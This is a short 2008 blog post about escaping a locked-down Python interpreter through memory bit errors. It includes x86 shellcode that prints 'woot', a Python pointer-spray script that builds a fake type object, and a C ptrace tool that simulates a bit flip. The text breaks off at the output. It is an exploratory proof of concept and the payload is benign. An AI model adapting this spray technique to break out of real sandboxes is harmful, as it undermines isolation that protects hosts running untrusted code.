For reasons that I won't ... (11 Jan 2008)

For reasons that I won't go into here, someone was asking me about running untrusted code in Python. Just as a musing, I came up with the following:

Although you might be able to lock down a Python interpreter so that it wouldn't run any code that could do anything bad, you still have to remember that you're running on a real computer. All real computers go subtly wrong and introduce bit errors in memory. If you're very lucky, you'll find that your server has ECC memory, but that only reduces the number of bit errors.

A Python object has a common header which includes a pointer to its type object. That, in turn, contains function pointers for some operations, like getattr and repr. If we have a pointer to a Python object, bit errors can move that pointer back and forth in memory. If we had lots of Python objects with payloads of pointers to a fake type object, we could hope that a bit error would push one of the pointers such that we can control the type object pointer.

Let's start with a bit of position independent code that prints "woot" and exits the process:

  SECTION .text
  BITS 32
  mov edx, 5
  mov ebx, 1
  call next
  pop ecx
  add ecx, 21
  mov eax, 4
  int 0x80
  mov eax, 1
  int 0x80
  db "woot", 10

Nasm that to t.out and we have our shellcode. Next, construct a python script that amplifies bit errors in an array of pointers in an expliot:

  import struct
  import os
  import array

  # load the shellcode
  shellcode = file('t.out', 'r').read()
  # put it in an array
  shellarray = array.array('c', shellcode)
  # get the address of the array and pack it in a pointer
  shelladdress = struct.pack('I', shellarray.buffer_info()[0])
  # replicate that pointer lots into an array
  eviltype_object = array.array('c', shelladdress * 100)
  # and get the address of that and replicate into a string
  evilstring = struct.pack('I', eviltype_object.buffer_info()[0]) * 100
  # create lots of pointers to that string
  evillist = [evilstring] * 100000
  print os.getpid()
  # Call the repr function pointer for every element in evillist for ever
  while True:
    for x in evillist:
      print 'ping'

So, memory looks like this:

[pointer pointer pointer ...] | | | V V V [String-header pointer pointer pointer] | | | V V V [pointer pointer ... ] | | V V [shellcode ]

So the size of the first level gives us a window in which bit errors can turn into exploits. The size of the second level lets us capture more bit errors (we could also have a couple of strings, in the hope that they are next to each other on the heap, so that we can catch bit-clears too). How many bits of each 32-bit pointer can we expect to be useful? Well, it's probably reasonable to have a 128K evilstring, so that's 15 bits (since changing bits 0 and 1 will screwup our alignment). So, about half of them. To test the above, I cheated and wrote a bit-error-generator:

int main(int argc, char **argv) {
    const int pid = atoi(argv[1]);
    const unsigned start = strtoul(argv[2], NULL, 0);
    ptrace(PTRACE_ATTACH, pid, NULL, NULL);
    long v = ptrace(PTRACE_PEEKDATA, pid, (void *) start + 32, NULL);
    v += 32;
    ptrace(PTRACE_POKEDATA, pid, (void *) start + 32, (void *) v);
    ptrace(PTRACE_DETACH, pid, NULL, NULL);
    return 0;

And here's the output:

% python